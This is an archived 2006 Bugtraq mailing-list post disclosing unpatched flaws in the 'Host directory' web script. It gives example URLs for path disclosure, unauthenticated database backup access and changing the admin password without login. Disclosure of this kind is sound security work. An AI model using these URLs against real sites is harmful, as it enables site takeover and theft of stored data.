| To: | bugtraq@securityfocus.com |
|---|---|
| Subject: | Host directory full disclosure and input error |
| From: | hack2prison@yahoo.com |
| Date: | 27 Dec 2006 11:05:47 -0000 |
| Delivered-to: | sp-com-lists@consult.net |
| Delivered-to: | bugtraq-list@securepoint.com |
| Delivered-to: | mailing list bugtraq@securityfocus.com |
| Delivered-to: | moderator for bugtraq@securityfocus.com |
| List-help: | <mailto:bugtraq-help@securityfocus.com> |
| List-id: | <bugtraq.list-id.securityfocus.com> |
| List-post: | <mailto:bugtraq@securityfocus.com> |
| List-subscribe: | <mailto:bugtraq-subscribe@securityfocus.com> |
| List-unsubscribe: | <mailto:bugtraq-unsubscribe@securityfocus.com> |
| Mailing-list: | contact bugtraq-help@securityfocus.com; run by ezmlm |
Host directory is a product of scriptsfrenzy.com and alstrasoft.com I check lastest version and maybe infected lower versions. I contacted vendor 5 times in 2 months but not received any replies. - FullPath disclosure: http://site.ext/path/ANY_INCORRECT_LINK Warning: main(/home/user/public_html/include/ANY_INCORRECT_LINK.php): failed to open stream: No such file or directory in /home/user/public_html/include/main.php on line 25 - Backup database bypass: http://site.ext/path/admin/backup/db - Change admin password without login: http://site.ext/path/admin/config |
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | Re: XSS with Vbulletin (new idea !), bas |
|---|---|
| Next by Date: | Secure Login Manager Multiple Input Validation Vulnerabilities, DoZ |
| Previous by Thread: | [OpenPKG-SA-2006.043] OpenPKG Security Advisory (links), OpenPKG GmbH |
| Next by Thread: | Secure Login Manager Multiple Input Validation Vulnerabilities, DoZ |
| Indexes: | [Date] [Thread] [Top] [All Lists] |